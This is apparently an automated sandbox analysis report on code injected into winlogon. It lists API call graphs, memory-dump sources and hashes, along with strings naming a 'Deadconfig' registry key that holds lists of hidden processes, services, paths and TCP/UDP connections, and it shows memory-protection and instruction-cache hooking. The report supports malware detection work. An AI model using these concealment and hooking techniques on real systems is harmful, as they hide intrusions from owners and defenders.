                                                        execution_graph 7670 225dc64e2e8 7671 225dc64e312 7670->7671 7672 225dc64b980 _invalid_parameter_noinfo 13 API calls 7671->7672 7673 225dc64e331 7672->7673 7674 225dc64b9f8 __free_lconv_mon 13 API calls 7673->7674 7675 225dc64e33f 7674->7675 7676 225dc64b980 _invalid_parameter_noinfo 13 API calls 7675->7676 7677 225dc64e369 7675->7677 7678 225dc64e35b 7676->7678 7679 225dc64d77c 6 API calls 7677->7679 7681 225dc64e372 7677->7681 7680 225dc64b9f8 __free_lconv_mon 13 API calls 7678->7680 7679->7677 7680->7677 7682 225dc6428e8 7684 225dc64292d 7682->7684 7683 225dc642990 7684->7683 7685 225dc643c70 StrCmpNIW 7684->7685 7685->7684 7096 225dc642a74 7098 225dc642ac8 7096->7098 7097 225dc642ae3 7098->7097 7100 225dc6433f8 7098->7100 7101 225dc643490 7100->7101 7103 225dc64341d 7100->7103 7101->7097 7102 225dc643c70 StrCmpNIW 7102->7103 7103->7101 7103->7102 7104 225dc641d08 StrCmpIW StrCmpW 7103->7104 7104->7103 7105 225dc64ae74 7106 225dc64ae7c 7105->7106 7108 225dc64aead 7106->7108 7110 225dc64aea9 7106->7110 7111 225dc64d77c 7106->7111 7116 225dc64aed8 7108->7116 7112 225dc64d3ec try_get_function 5 API calls 7111->7112 7113 225dc64d7b2 7112->7113 7114 225dc64d7bc 7113->7114 7115 225dc64d7c7 InitializeCriticalSectionAndSpinCount 7113->7115 7114->7106 7115->7114 7117 225dc64af03 7116->7117 7118 225dc64aee6 DeleteCriticalSection 7117->7118 7119 225dc64af07 7117->7119 7118->7117 7119->7110 6818 225dc64596d 6819 225dc645974 6818->6819 6820 225dc6459db 6819->6820 6821 225dc645a57 VirtualProtect 6819->6821 6822 225dc645a91 6821->6822 6823 225dc645a83 GetLastError 6821->6823 6823->6822 7120 225dc64e47c 7121 225dc64e4b2 7120->7121 7122 225dc64e4a4 7120->7122 7122->7121 7136 225dc64ad0c 7122->7136 7125 225dc64e4de 7144 225dc650e04 7125->7144 7126 225dc64e500 7126->7121 7147 225dc650db8 7126->7147 7130 225dc64e596 7132 225dc64d144 MultiByteToWideChar 7130->7132 7131 225dc64e544 7133 225dc64e579 7131->7133 7150 225dc64d144 
7131->7150 7132->7133 7133->7121 7134 225dc64b960 _set_errno_from_matherr 13 API calls 7133->7134 7134->7121 7137 225dc64ad2b 7136->7137 7138 225dc64ad30 7136->7138 7137->7125 7137->7126 7138->7137 7153 225dc64b348 GetLastError 7138->7153 7271 225dc6514c4 7144->7271 7148 225dc64ad0c 33 API calls 7147->7148 7149 225dc64e540 7148->7149 7149->7130 7149->7131 7151 225dc64d14c MultiByteToWideChar 7150->7151 7154 225dc64b36f 7153->7154 7155 225dc64b36a 7153->7155 7156 225dc64d728 _invalid_parameter_noinfo 6 API calls 7154->7156 7159 225dc64b377 SetLastError 7154->7159 7157 225dc64d6e0 _invalid_parameter_noinfo 6 API calls 7155->7157 7158 225dc64b392 7156->7158 7157->7154 7158->7159 7161 225dc64b980 _invalid_parameter_noinfo 13 API calls 7158->7161 7163 225dc64b416 7159->7163 7164 225dc64ad4b 7159->7164 7162 225dc64b3a5 7161->7162 7165 225dc64b3c3 7162->7165 7166 225dc64b3b3 7162->7166 7211 225dc64acb4 7163->7211 7203 225dc64e604 7164->7203 7170 225dc64d728 _invalid_parameter_noinfo 6 API calls 7165->7170 7168 225dc64d728 _invalid_parameter_noinfo 6 API calls 7166->7168 7171 225dc64b3ba 7168->7171 7172 225dc64b3cb 7170->7172 7179 225dc64b9f8 __free_lconv_mon 13 API calls 7171->7179 7173 225dc64b3e1 7172->7173 7174 225dc64b3cf 7172->7174 7177 225dc64b0b4 _invalid_parameter_noinfo 13 API calls 7173->7177 7176 225dc64d728 _invalid_parameter_noinfo 6 API calls 7174->7176 7176->7171 7181 225dc64b3e9 7177->7181 7179->7159 7183 225dc64b9f8 __free_lconv_mon 13 API calls 7181->7183 7183->7159 7204 225dc64e619 7203->7204 7205 225dc64ad6e 7203->7205 7204->7205 7255 225dc64eaac 7204->7255 7207 225dc64e638 7205->7207 7208 225dc64e660 7207->7208 7209 225dc64e64d 7207->7209 7208->7137 7209->7208 7268 225dc64cdb8 7209->7268 7220 225dc64dd28 7211->7220 7246 225dc64dce0 7220->7246 7251 225dc64aebc EnterCriticalSection 7246->7251 7256 225dc64b348 33 API calls 7255->7256 7257 225dc64eabb 7256->7257 7258 225dc64eb06 7257->7258 7267 225dc64aebc EnterCriticalSection 7257->7267 7258->7205 7269 
225dc64b348 33 API calls 7268->7269 7270 225dc64cdc1 7269->7270 7273 225dc651521 7271->7273 7276 225dc65152d 7271->7276 7272 225dc647d60 _handle_error 8 API calls 7275 225dc650e17 7272->7275 7273->7272 7274 225dc64b960 _set_errno_from_matherr 13 API calls 7274->7273 7275->7121 7276->7273 7276->7274 7686 225dc647efc 7693 225dc649470 7686->7693 7689 225dc647f09 7702 225dc649798 7693->7702 7696 225dc64abb4 7697 225dc64b4c4 _invalid_parameter_noinfo 13 API calls 7696->7697 7698 225dc647f12 7697->7698 7698->7689 7699 225dc649484 7698->7699 7718 225dc64972c 7699->7718 7701 225dc64948f 7701->7689 7703 225dc6497b7 GetLastError 7702->7703 7704 225dc647f05 7702->7704 7714 225dc649b10 7703->7714 7704->7689 7704->7696 7715 225dc649930 __vcrt_InitializeCriticalSectionEx 5 API calls 7714->7715 7716 225dc649b37 TlsGetValue 7715->7716 7719 225dc649740 7718->7719 7723 225dc64975a __vcrt_freeptd 7718->7723 7720 225dc649b10 __vcrt_freeptd 6 API calls 7719->7720 7722 225dc64974a 7719->7722 7720->7722 7724 225dc649b58 7722->7724 7723->7701 7725 225dc649930 __vcrt_InitializeCriticalSectionEx 5 API calls 7724->7725 7726 225dc649b86 7725->7726 7727 225dc649b98 TlsSetValue 7726->7727 7728 225dc649b90 7726->7728 7727->7728 7728->7723 7993 225dc648376 7994 225dc649538 __std_exception_copy 30 API calls 7993->7994 7995 225dc6483a1 7994->7995 7277 225dc64f478 7278 225dc64f480 7277->7278 7279 225dc64f495 7278->7279 7280 225dc64f4ae 7278->7280 7281 225dc64b960 _set_errno_from_matherr 13 API calls 7279->7281 7284 225dc64ad0c 33 API calls 7280->7284 7285 225dc64f4a5 7280->7285 7282 225dc64f49a 7281->7282 7283 225dc64b840 _invalid_parameter_noinfo 30 API calls 7282->7283 7283->7285 7284->7285 6872 225dc64f004 6873 225dc64f023 6872->6873 6874 225dc64f09c 6873->6874 6877 225dc64f033 6873->6877 6880 225dc648620 6874->6880 6878 225dc647d60 _handle_error 8 API calls 6877->6878 6879 225dc64f092 6878->6879 6883 225dc648634 IsProcessorFeaturePresent 6880->6883 6884 225dc64864b 6883->6884 6889 225dc6486d0 
RtlCaptureContext RtlLookupFunctionEntry 6884->6889 6890 225dc64865f 6889->6890 6891 225dc648700 RtlVirtualUnwind 6889->6891 6892 225dc648518 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 6890->6892 6891->6890 7996 225dc64d984 GetProcessHeap 7738 225dc64ab04 7739 225dc64ab1d 7738->7739 7741 225dc64ab35 7738->7741 7740 225dc64b9f8 __free_lconv_mon 13 API calls 7739->7740 7739->7741 7740->7741 7997 225dc642b84 7999 225dc642be1 7997->7999 7998 225dc642bfc 7999->7998 8000 225dc6434ac 3 API calls 7999->8000 8000->7998 8001 225dc64b184 8002 225dc64b189 8001->8002 8003 225dc64b19e 8001->8003 8007 225dc64b1a4 8002->8007 8008 225dc64b1e6 8007->8008 8009 225dc64b1ee 8007->8009 8010 225dc64b9f8 __free_lconv_mon 13 API calls 8008->8010 8011 225dc64b9f8 __free_lconv_mon 13 API calls 8009->8011 8010->8009 8012 225dc64b1fb 8011->8012 8013 225dc64b9f8 __free_lconv_mon 13 API calls 8012->8013 8014 225dc64b208 8013->8014 8015 225dc64b9f8 __free_lconv_mon 13 API calls 8014->8015 8016 225dc64b215 8015->8016 8017 225dc64b9f8 __free_lconv_mon 13 API calls 8016->8017 8018 225dc64b222 8017->8018 8019 225dc64b9f8 __free_lconv_mon 13 API calls 8018->8019 8020 225dc64b22f 8019->8020 8021 225dc64b9f8 __free_lconv_mon 13 API calls 8020->8021 8022 225dc64b23c 8021->8022 8023 225dc64b9f8 __free_lconv_mon 13 API calls 8022->8023 8024 225dc64b249 8023->8024 8025 225dc64b9f8 __free_lconv_mon 13 API calls 8024->8025 8026 225dc64b259 8025->8026 8027 225dc64b9f8 __free_lconv_mon 13 API calls 8026->8027 8028 225dc64b269 8027->8028 8033 225dc64b054 8028->8033 8047 225dc64aebc EnterCriticalSection 8033->8047 6893 225dc644000 6895 225dc643f4d _invalid_parameter_noinfo 6893->6895 6894 225dc643f9d VirtualQuery 6894->6895 6896 225dc643fb7 6894->6896 6895->6894 6895->6896 6897 225dc644002 GetLastError 6895->6897 6897->6895 6897->6896 6712 225dc641ac8 6719 225dc641628 GetProcessHeap HeapAlloc 6712->6719 6714 225dc641ad7 6715 225dc641ade SleepEx 6714->6715 6718 
225dc641598 StrCmpIW StrCmpW 6714->6718 6770 225dc6418b4 6714->6770 6716 225dc641628 50 API calls 6715->6716 6716->6714 6718->6714 6787 225dc641268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 6719->6787 6721 225dc641650 6788 225dc641000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 6721->6788 6723 225dc641658 6789 225dc641268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 6723->6789 6725 225dc641661 6790 225dc641268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 6725->6790 6727 225dc64166a 6791 225dc641268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 6727->6791 6729 225dc641673 6792 225dc641000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 6729->6792 6731 225dc64167c 6793 225dc641000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 6731->6793 6733 225dc641685 6794 225dc641000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 6733->6794 6735 225dc64168e RegOpenKeyExW 6736 225dc6418a6 6735->6736 6737 225dc6416c0 RegOpenKeyExW 6735->6737 6736->6714 6738 225dc6416e9 6737->6738 6739 225dc6416ff RegOpenKeyExW 6737->6739 6801 225dc6412bc RegQueryInfoKeyW 6738->6801 6741 225dc64173a RegOpenKeyExW 6739->6741 6742 225dc641723 6739->6742 6745 225dc641775 RegOpenKeyExW 6741->6745 6746 225dc64175e 6741->6746 6795 225dc64104c RegQueryInfoKeyW 6742->6795 6747 225dc641799 6745->6747 6748 225dc6417b0 RegOpenKeyExW 6745->6748 6750 225dc6412bc 16 API calls 6746->6750 6752 225dc6412bc 16 API calls 6747->6752 6753 225dc6417eb RegOpenKeyExW 6748->6753 6754 225dc6417d4 6748->6754 6751 225dc64176b RegCloseKey 6750->6751 6751->6745 6755 225dc6417a6 RegCloseKey 6752->6755 6757 225dc641826 RegOpenKeyExW 6753->6757 6758 225dc64180f 6753->6758 6756 225dc6412bc 16 API calls 6754->6756 6755->6748 6759 225dc6417e1 RegCloseKey 6756->6759 6761 225dc64184a 6757->6761 6762 225dc641861 RegOpenKeyExW 6757->6762 6760 225dc64104c 6 API calls 6758->6760 6759->6753 6765 225dc64181c RegCloseKey 6760->6765 6766 225dc64104c 6 API calls 6761->6766 6763 225dc64189c RegCloseKey 

                                                        Control-flow Graph
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.2947029260.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                        • Associated: 0000000B.00000002.2946249694.00000225DC640000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000B.00000002.2947951309.00000225DC653000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000B.00000002.2948718553.00000225DC65D000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000B.00000002.2949516333.00000225DC65F000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000B.00000002.2950402978.00000225DC665000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_225dc640000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: EnumerateValue
                                                        • String ID:
                                                        • API String ID: 1749906896-0
                                                        • Opcode ID: c7d29f1da1c35067c358ffcc45280992f1212d67cf94ff1f26cc45362ca16225
                                                        • Instruction ID: e0bf969e9573ba16cdea1d0d60eb7923deb9c3e45bdbfb511f310f72bab8fb95
                                                        • Opcode Fuzzy Hash: c7d29f1da1c35067c358ffcc45280992f1212d67cf94ff1f26cc45362ca16225
                                                        • Instruction Fuzzy Hash: 4C11A23A20CBA092E775DF9EB84461AB394F384B95F618065EE8A83710EF34C4C6C740

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.2947029260.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                        • Associated: 0000000B.00000002.2946249694.00000225DC640000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000B.00000002.2947951309.00000225DC653000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000B.00000002.2948718553.00000225DC65D000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000B.00000002.2949516333.00000225DC65F000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000B.00000002.2950402978.00000225DC665000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_225dc640000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
                                                        • String ID: SOFTWARE\Deadconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                        • API String ID: 2135414181-3864762265
                                                        • Opcode ID: f4bb390ec195533d0d08c97f362a19cf980481d45eb9fb13aebdfbbaa82a3014
                                                        • Instruction ID: aad90fbc9abf91f474f9009489ed57291f689121fcda537680ac4bbedb82104b
                                                        • Opcode Fuzzy Hash: f4bb390ec195533d0d08c97f362a19cf980481d45eb9fb13aebdfbbaa82a3014
                                                        • Instruction Fuzzy Hash: 7C712F3A324F20A6EB109FA9E85869D37B4F784F8AF509521DE4E47B69EF34C445C740

                                                        Control-flow Graph
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.2947029260.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                        • Associated: 0000000B.00000002.2946249694.00000225DC640000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000B.00000002.2947951309.00000225DC653000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000B.00000002.2948718553.00000225DC65D000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000B.00000002.2949516333.00000225DC65F000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000B.00000002.2950402978.00000225DC665000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_225dc640000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: Thread$Current$Context
                                                        • String ID:
                                                        • API String ID: 1666949209-0
                                                        • Opcode ID: 04eb4b821cfb78ceefbf78a645bcab5cb65f7271ac457b266e4150bc93d30c0d
                                                        • Instruction ID: 6b8e7d18f0b85bd53694ac57d10ebcb7ae98c315cd64fb94ae0e802435b0b8b6
                                                        • Opcode Fuzzy Hash: 04eb4b821cfb78ceefbf78a645bcab5cb65f7271ac457b266e4150bc93d30c0d
                                                        • Instruction Fuzzy Hash: 5DD19C7A21CF9895EA70DB9AE49835A77A0F3C8B85F104156EACE47BA5DF3CC541CB00

                                                        Control-flow Graph
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.2947029260.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                        • Associated: 0000000B.00000002.2946249694.00000225DC640000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000B.00000002.2947951309.00000225DC653000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000B.00000002.2948718553.00000225DC65D000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000B.00000002.2949516333.00000225DC65F000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000B.00000002.2950402978.00000225DC665000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_225dc640000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: CurrentThread
                                                        • String ID:
                                                        • API String ID: 2882836952-0
                                                        • Opcode ID: 5da0d5c4ace7b3df51b797f0c4c7771e58ce7a7ec004b9d6d28105fb697354a3
                                                        • Instruction ID: a8847a8707aee4229bb7f638773afa3f00201387ed177329a4ffc1b3de07b110
                                                        • Opcode Fuzzy Hash: 5da0d5c4ace7b3df51b797f0c4c7771e58ce7a7ec004b9d6d28105fb697354a3
                                                        • Instruction Fuzzy Hash: A802EB3A21DB9496EB60CB99F49435AB7A1F3C5795F104055EA8E87BA8DF7CC484CF00

                                                        Control-flow Graph

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.2947029260.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                        • Associated: 0000000B.00000002.2946249694.00000225DC640000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000B.00000002.2947951309.00000225DC653000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000B.00000002.2948718553.00000225DC65D000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000B.00000002.2949516333.00000225DC65F000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000B.00000002.2950402978.00000225DC665000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_225dc640000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: CurrentProcessProtectVirtual$HandleModule
                                                        • String ID:
                                                        • API String ID: 1092925422-0
                                                        • Opcode ID: f49a43d8567c213b337cf74c33d87ea9f8b0f1b984059dad2b4cd4689300dbc7
                                                        • Instruction ID: ecad29a5d92746c3c18f8328d0e188f3c62a98b5fc453ac47458802f6d7a0afc
                                                        • Opcode Fuzzy Hash: f49a43d8567c213b337cf74c33d87ea9f8b0f1b984059dad2b4cd4689300dbc7
                                                        • Instruction Fuzzy Hash: 26118E2E718F64A2EB159BA9E44C3697260F748F85F148435DE8D07794EF3DC548C700
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000003.1759673624.00000225DC610000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC610000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_3_225dc610000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: Virtual$Protect$AllocLibraryLoad
                                                        • String ID:
                                                        • API String ID: 3316853933-0
                                                        • Opcode ID: 24c55482e3ee7e9e3b87009127322f5f012175c8db73c85287ddc3c1b6fbd12d
                                                        • Instruction ID: 57904fb719dbcf7ce7db4895da7f5d34b6f39376f0c1471c62ba19f9c4407fb4
                                                        • Opcode Fuzzy Hash: 24c55482e3ee7e9e3b87009127322f5f012175c8db73c85287ddc3c1b6fbd12d
                                                        • Instruction Fuzzy Hash: 5E91327AB12AA097EF658F69D008769B3E1F754B9AF54C125DF4A47B88DA38D802C700

                                                        Control-flow Graph

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.2947029260.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                        • Associated: 0000000B.00000002.2946249694.00000225DC640000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000B.00000002.2947951309.00000225DC653000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000B.00000002.2948718553.00000225DC65D000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000B.00000002.2949516333.00000225DC65F000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000B.00000002.2950402978.00000225DC665000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_225dc640000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: Virtual$AllocQuery
                                                        • String ID:
                                                        • API String ID: 31662377-0
                                                        • Opcode ID: d67b081f5b52b9db25ef63bd3fc49ef94c05e675607d2408fbad0ef13c5677fc
                                                        • Instruction ID: 7368f0824190400fd5ed9cfb9fff0c2e4f110b6e7a9d9859b1506aa5e2943c8e
                                                        • Opcode Fuzzy Hash: d67b081f5b52b9db25ef63bd3fc49ef94c05e675607d2408fbad0ef13c5677fc
                                                        • Instruction Fuzzy Hash: A9314F3621EE98A1EA70DB9CF05835A76A0F388B85F508575F6CE46B98DF7DC581CB00

                                                        Control-flow Graph

                                                        APIs
                                                        • GetModuleFileNameW.KERNEL32 ref: 00000225DC643631
                                                        • PathFindFileNameW.SHLWAPI ref: 00000225DC643640
                                                          • Part of subcall function 00000225DC643C70: StrCmpNIW.SHLWAPI(?,?,?,00000225DC64255A), ref: 00000225DC643C88
                                                          • Part of subcall function 00000225DC643BB8: GetModuleHandleW.KERNEL32(?,?,?,?,?,00000225DC643657), ref: 00000225DC643BC6
                                                          • Part of subcall function 00000225DC643BB8: GetCurrentProcess.KERNEL32(?,?,?,?,?,00000225DC643657), ref: 00000225DC643BF4
                                                          • Part of subcall function 00000225DC643BB8: VirtualProtectEx.KERNELBASE(?,?,?,?,?,00000225DC643657), ref: 00000225DC643C16
                                                          • Part of subcall function 00000225DC643BB8: GetCurrentProcess.KERNEL32(?,?,?,?,?,00000225DC643657), ref: 00000225DC643C34
                                                          • Part of subcall function 00000225DC643BB8: VirtualProtectEx.KERNELBASE(?,?,?,?,?,00000225DC643657), ref: 00000225DC643C55
                                                        • CreateThread.KERNELBASE ref: 00000225DC643687
                                                          • Part of subcall function 00000225DC641D3C: GetCurrentThread.KERNEL32 ref: 00000225DC641D47
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.2947029260.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                        • Associated: 0000000B.00000002.2946249694.00000225DC640000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000B.00000002.2947951309.00000225DC653000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000B.00000002.2948718553.00000225DC65D000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000B.00000002.2949516333.00000225DC65F000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000B.00000002.2950402978.00000225DC665000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_225dc640000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                        • String ID:
                                                        • API String ID: 1683269324-0
                                                        • Opcode ID: 78a450f75234da4d748a8cc1e146820bb39c36540aa3f900bd2c9a3848025828
                                                        • Instruction ID: 9f01a0d394e9f497953db1b42ee56594c734cff64a0db99230737221b0b2cb23
                                                        • Opcode Fuzzy Hash: 78a450f75234da4d748a8cc1e146820bb39c36540aa3f900bd2c9a3848025828
                                                        • Instruction Fuzzy Hash: 37115E7C62CE36B2FB64ABE8A50D35A3690BB55B57F60C5B5E907856D0EF7CC104C600

                                                        Control-flow Graph

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.2947029260.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                        • Associated: 0000000B.00000002.2946249694.00000225DC640000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000B.00000002.2947951309.00000225DC653000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000B.00000002.2948718553.00000225DC65D000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000B.00000002.2949516333.00000225DC65F000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000B.00000002.2950402978.00000225DC665000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_225dc640000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: CacheCurrentFlushInstructionProcessProtectVirtual
                                                        • String ID:
                                                        • API String ID: 3733156554-0
                                                        • Opcode ID: e1a380b039a1d49db448bdd609ecfca87e994cc091e9a901e35142708e003b4b
                                                        • Instruction ID: 86d1713a14f383e0431d41c073f07963a759e0e8e73e7186f31f9d4de3268f0f
                                                        • Opcode Fuzzy Hash: e1a380b039a1d49db448bdd609ecfca87e994cc091e9a901e35142708e003b4b
                                                        • Instruction Fuzzy Hash: F6F0303A61CF14A0D630DB59E44434B77A0F3887D5F548152F98E03B69DA38C290CF04

                                                        Control-flow Graph

                                                        APIs
                                                          • Part of subcall function 00000225DC641628: GetProcessHeap.KERNEL32 ref: 00000225DC641633
                                                          • Part of subcall function 00000225DC641628: HeapAlloc.KERNEL32 ref: 00000225DC641642
                                                          • Part of subcall function 00000225DC641628: RegOpenKeyExW.KERNELBASE ref: 00000225DC6416B2
                                                          • Part of subcall function 00000225DC641628: RegOpenKeyExW.KERNELBASE ref: 00000225DC6416DF
                                                          • Part of subcall function 00000225DC641628: RegCloseKey.ADVAPI32 ref: 00000225DC6416F9
                                                          • Part of subcall function 00000225DC641628: RegOpenKeyExW.KERNELBASE ref: 00000225DC641719
                                                          • Part of subcall function 00000225DC641628: RegCloseKey.KERNELBASE ref: 00000225DC641734
                                                          • Part of subcall function 00000225DC641628: RegOpenKeyExW.KERNELBASE ref: 00000225DC641754
                                                          • Part of subcall function 00000225DC641628: RegCloseKey.ADVAPI32 ref: 00000225DC64176F
                                                          • Part of subcall function 00000225DC641628: RegOpenKeyExW.KERNELBASE ref: 00000225DC64178F
                                                          • Part of subcall function 00000225DC641628: RegCloseKey.ADVAPI32 ref: 00000225DC6417AA
                                                          • Part of subcall function 00000225DC641628: RegOpenKeyExW.KERNELBASE ref: 00000225DC6417CA
                                                        • SleepEx.KERNELBASE ref: 00000225DC641AE3
                                                          • Part of subcall function 00000225DC641628: RegCloseKey.ADVAPI32 ref: 00000225DC6417E5
                                                          • Part of subcall function 00000225DC641628: RegOpenKeyExW.KERNELBASE ref: 00000225DC641805
                                                          • Part of subcall function 00000225DC641628: RegCloseKey.ADVAPI32 ref: 00000225DC641820
                                                          • Part of subcall function 00000225DC641628: RegOpenKeyExW.KERNELBASE ref: 00000225DC641840
                                                          • Part of subcall function 00000225DC641628: RegCloseKey.ADVAPI32 ref: 00000225DC64185B
                                                          • Part of subcall function 00000225DC641628: RegOpenKeyExW.KERNELBASE ref: 00000225DC64187B
                                                          • Part of subcall function 00000225DC641628: RegCloseKey.ADVAPI32 ref: 00000225DC641896
                                                          • Part of subcall function 00000225DC641628: RegCloseKey.KERNELBASE ref: 00000225DC6418A0
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.2947029260.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                        • Associated: 0000000B.00000002.2946249694.00000225DC640000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000B.00000002.2947951309.00000225DC653000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000B.00000002.2948718553.00000225DC65D000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000B.00000002.2949516333.00000225DC65F000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000B.00000002.2950402978.00000225DC665000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_225dc640000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: CloseOpen$Heap$AllocProcessSleep
                                                        • String ID:
                                                        • API String ID: 948135145-0
                                                        • Opcode ID: 64999c0117d7972c63d36e484e4b5c22b997d5fb2e44b7ed48be0e5086276bc0
                                                        • Instruction ID: 5cdb0bb0ba144f38185c4d45c3f0ba974282997b764186fa0b30638e5480d31c
                                                        • Opcode Fuzzy Hash: 64999c0117d7972c63d36e484e4b5c22b997d5fb2e44b7ed48be0e5086276bc0
                                                        • Instruction Fuzzy Hash: A72146A921CE20E1FB50DBEFD9593A933A4A744BC7F04D4618E0F872A5EE34C451C200
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.2947029260.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                        • Associated: 0000000B.00000002.2946249694.00000225DC640000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000B.00000002.2947951309.00000225DC653000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000B.00000002.2948718553.00000225DC65D000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000B.00000002.2949516333.00000225DC65F000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000B.00000002.2950402978.00000225DC665000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_225dc640000_winlogon.jbxd
                                                        Similarity
